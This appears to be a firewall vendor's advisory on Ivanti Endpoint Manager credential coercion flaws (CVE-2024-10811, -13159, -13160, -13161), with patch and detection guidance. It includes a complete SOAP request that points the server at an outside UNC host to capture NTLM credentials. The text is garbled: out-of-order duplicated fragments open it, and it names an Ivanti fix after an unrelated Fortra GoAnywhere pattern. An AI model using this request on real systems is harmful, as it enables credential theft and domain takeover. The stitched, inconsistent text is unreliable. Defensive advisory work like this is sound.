This vulnerability is a credential coercion vulnerability in Ivanti Endpoint Manager.
An attacker can attempt to obtain credentials and ultimately take over a domain by sending
SOAP XML data containing a remote UNC address accessible to the attacker's server to /WSVulnerabilityCore/VulCore.asmx.
A security patch for this vulnerability was released in January 2025, and AIWAF products will address this vulnerability
through the "2289 / Fortra GoAnywhere MFT Authentication Bypass (1)" pattern, which will be added in the February 2026 pattern update.
all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment.
This report summarizes the analysis of vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 that occurred in this solution.
Source : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html
in the NVD in January 2025. After these vulnerabilities were reported, horizon3.ai released a detailed analysis of them.
These vulnerabilities allow an attacker to manipulate an absolute path-based path traversal flaw to send a crafted UNC path,
causing Ivanti EPM to access an attacker-controlled SMB server located at that path, leading to credential theft.
An attacker can exploit this vulnerability by sending SOAP XML data containing a remote UNC address accessible to the attacker’s server
to the vulnerable endpoint /WSVulnerabilityCore/VulCore.asmx. When Ivanti EPM attempts to authenticate to the attacker’s SMB server,
the attacker can capture the NTLMv2 credentials and relay them to an LDAP server to create a privileged machine account,
enabling privilege escalation and potential domain takeover.
This issue occurs within the GetHashForFile, GetHashForSingleFile, GetHashForWildcard, and GetHashForWildcardRecursive functions
in the VulCore class, with separate CVE identifiers assigned for each function.
Example attack request:
customers using this solution can mitigate the issue by applying that patch.
In our AIWAF, this vulnerability will be addressed through the “2289 / Fortra GoAnywhere MFT Authentication Bypass (1)”
pattern, which will be added in the February 2026 pattern update.
Source : https://hub.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6
of all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment. The vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are considered highly exploitable, as detailed
attack methods have been disclosed and the level of technical difficulty required to exploit them is relatively low.
Therefore, customers using this solution are strongly advised to promptly apply the relevant security patches.
Our TA team continues to monitor vulnerabilities discovered in Ivanti products and will respond quickly to any newly identified issues in the future.
An attacker can attempt to obtain credentials and ultimately take over a domain by sending
SOAP XML data containing a remote UNC address accessible to the attacker's server to /WSVulnerabilityCore/VulCore.asmx.
A security patch for this vulnerability was released in January 2025, and AIWAF products will address this vulnerability
through the "2289 / Fortra GoAnywhere MFT Authentication Bypass (1)" pattern, which will be added in the February 2026 pattern update.
1. Overview
Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that provides integrated management ofall endpoints within an enterprise, including PCs, mobile devices, and IoT equipment.
This report summarizes the analysis of vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 that occurred in this solution.
Source : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html
2. Attack type
CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are credential coercion vulnerabilities that were registeredin the NVD in January 2025. After these vulnerabilities were reported, horizon3.ai released a detailed analysis of them.
These vulnerabilities allow an attacker to manipulate an absolute path-based path traversal flaw to send a crafted UNC path,
causing Ivanti EPM to access an attacker-controlled SMB server located at that path, leading to credential theft.
An attacker can exploit this vulnerability by sending SOAP XML data containing a remote UNC address accessible to the attacker’s server
to the vulnerable endpoint /WSVulnerabilityCore/VulCore.asmx. When Ivanti EPM attempts to authenticate to the attacker’s SMB server,
the attacker can capture the NTLMv2 credentials and relay them to an LDAP server to create a privileged machine account,
enabling privilege escalation and potential domain takeover.
This issue occurs within the GetHashForFile, GetHashForSingleFile, GetHashForWildcard, and GetHashForWildcardRecursive functions
in the VulCore class, with separate CVE identifiers assigned for each function.
Example attack request:
POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
Content-Length: 426
Content-Type: application/xml; charset=utf-8
Host: vulnerable.site.com
Soapaction: http://tempuri.org/GetHashForWildcardRecursive
User-Agent: HTTPie
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetHashForWildcardRecursive xmlns="http://tempuri.org/">
<wildcard>\\\\test.com\\tmp\\file1.txt</wildcard>
</GetHashForWildcardRecursive>
</soap:Body>
</soap:Envelope>
3. Response
Since Ivanti included a security patch for this vulnerability in the January 2025 security update,customers using this solution can mitigate the issue by applying that patch.
In our AIWAF, this vulnerability will be addressed through the “2289 / Fortra GoAnywhere MFT Authentication Bypass (1)”
pattern, which will be added in the February 2026 pattern update.
Source : https://hub.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6
4. Conclusion
Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that integrates the managementof all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment. The vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are considered highly exploitable, as detailed
attack methods have been disclosed and the level of technical difficulty required to exploit them is relatively low.
Therefore, customers using this solution are strongly advised to promptly apply the relevant security patches.
Our TA team continues to monitor vulnerabilities discovered in Ivanti products and will respond quickly to any newly identified issues in the future.
